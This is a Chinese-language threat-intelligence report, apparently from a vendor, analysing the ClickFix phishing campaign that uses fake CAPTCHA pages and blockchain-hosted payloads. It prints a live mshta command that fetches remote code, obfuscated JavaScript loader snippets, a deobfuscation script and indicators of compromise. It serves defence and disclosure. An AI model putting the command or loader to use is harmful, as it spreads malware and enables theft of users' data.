曾几何时,验证码是横亘在人与机器之间的那道数字藩篱,以看似简单的交互,守护着虚拟世界的秩序。然而,当人工智能的浪潮席卷而来,昔日泾渭分明的界限开始变得模糊不清。黑产团伙敏锐地捕捉到这种变化带来的“信任错位”,他们洞悉用户对日渐繁琐验证机制的疲惫与麻木,精心编织出一张名为“Clickfix”的钓鱼之网。这项最早于2024年5月浮出水面的技法,历经短短半年的演变,已蜕变成一套复杂而成熟的攻击体系,其背后的深思熟虑,令人警惕。
1.攻击主要特征
观察到的攻击活动通常利用伪造的交互式页面,模拟如 Google Meet 或 reCaptcha 等常用服务,诱导用户执行一系列操作,从而实现恶意代码的传播和执行。攻击流程的关键步骤如下:
下图为黑产团伙实施攻击的完整流程,该流程可分为三个主要阶段:
2.溯源分析
通过分析网络行为,可观察到恶意脚本向
https://data-seed-prebsc-1-s1[.]bnbchain[.]org:8545/ 发送请求,此为币安链的 RPC 节点。攻击者通过该请求获取后续恶意代码。他们将恶意代码存储于智能合约,以此规避传统的威胁情报拦截措施。此外,智能合约的去中心化特性也使其难以被单点清除。
body="<script id=\"sjc\""
在2025年1月的时间点,全网有超过700个受害网站被植入了钓鱼恶意代码。
在诱导用户执行恶意代码成功后,黑产团伙为了提升攻击的成功率,大量利用了混淆技术,下面是自动复制到用户剪贴板,诱导用户执行的恶意命令:
mshta https://solve.vwglq.com/awjxs.captcha?u=0608f4ba-cf75-41b2-ab6f-ba4a4aea199a # ✅ ''I am not a robot - reCAPTCHA Verification ID: 5006''
该命令利用mshta加载远程的恶意代码,url通过cdn转发跳转到
import re
f = open("658d84007977b9bcbac196d09ec012e15dba6d71f026613bb08e3a0ec4aceef8", "rb")
data = f.read()
pattern = re.compile(b'<script>(.*?)</script>', re.DOTALL)
scripts = pattern.findall(data)
def deobfuscate_payload1(AzCWm):
# Extract substring
cJvxP = AzCWm[27:61047]
# Process hex pairs
decoded = ''
for i inrange(0, len(cJvxP), 3):
if i + 2 <= len(cJvxP):
hex_pair = cJvxP[i:i+2]
try:
# Convert hex to ASCII
char = chr(int(hex_pair, 16))
decoded += char
except ValueError:
continue
return decoded
result = deobfuscate_payload1(data)
print(result)
window.moveTo(9999,0)
window.onerror = function(){returntrue}
varAzCWm = document.documentElement.outerHTML;
var cJvxP = AzCWm.substring(27 , 61047);
eval(cJvxP.replace(/(..)./g, function(match, p1) {returnString.fromCharCode(parseInt(p1, 16))}))
AzCWm(ilcMIc){var cJvxP= '';for (varOkbNpV = 0;OkbNpV < ilcMIc.length; OkbNpV++){varHcWCG = String.fromCharCode(ilcMIc[OkbNpV] - 395);cJvxP = cJvxP + HcWCG}return cJvxP};var cJvxP = AzCWm([507,506,514,496,509,510,499,496,503,503,441,496,515,496,427,440,514,427,444,427,440,496,507...
这段javascript的作用是通过执行powershell来加载下一阶段的恶意代码。为了自动化提取去混淆后的恶意代码,我们可以使用腾讯云安全威胁情报中心官网 https://tix.qq.com 提供的“文件沙箱”功能,将Poket.mp4的后缀名改成.hta以后,投递到“文件沙箱”,我们可以观察到Att&ck行为规则命中的高危行为,其中正是执行的powershell恶意命令,从https://deduhko[.]klipzyroloo[.]shop/mazkk.eml下载到下一阶段的恶意代码。
2.2.1.小结
用户被诱导执行恶意命令后,会触发4阶段的连锁反应,每阶段运行的恶意代码都经过高度混淆且设置了多重逃避检测机制,最后植入后门程序盗取用户敏感信息。
3.总结
ClickFix背后的攻击者不仅在社会工程学技巧上表现出高度的专业化,巧妙地利用用户对常见验证机制的信任,更创新性地利用区块链技术的去中心化特性来躲避传统安全防护的检测,延长恶意代码的存活周期。攻击链条中的多阶段恶意代码下载,以及对恶意代码的层层混淆,都显著增加了分析溯源的难度,凸显了黑产团伙攻击手法的复杂性和隐蔽性。
4.IOC
solve[.]vwglq[.]com |
solve[.]jenj[.]org |
solve[.]gevaq[.]com |
solve[.]fizq[.]net |
deduhko2[.]kliphuwatey[.]shop |
deduhko[.]klipzyroloo[.]shop |
klipvumisui[.]shop |
9fb3db7b334f385701b3c88d63b7e5ee |
617fa9b16221e1327bf21732b3e8e568 |
51f99eddd33cc04fb0f55f873b76d907 |
产品体验
阅读原文或前往官网 https://tix.qq.com/
了解更多腾讯云安全威胁情报中心产品矩阵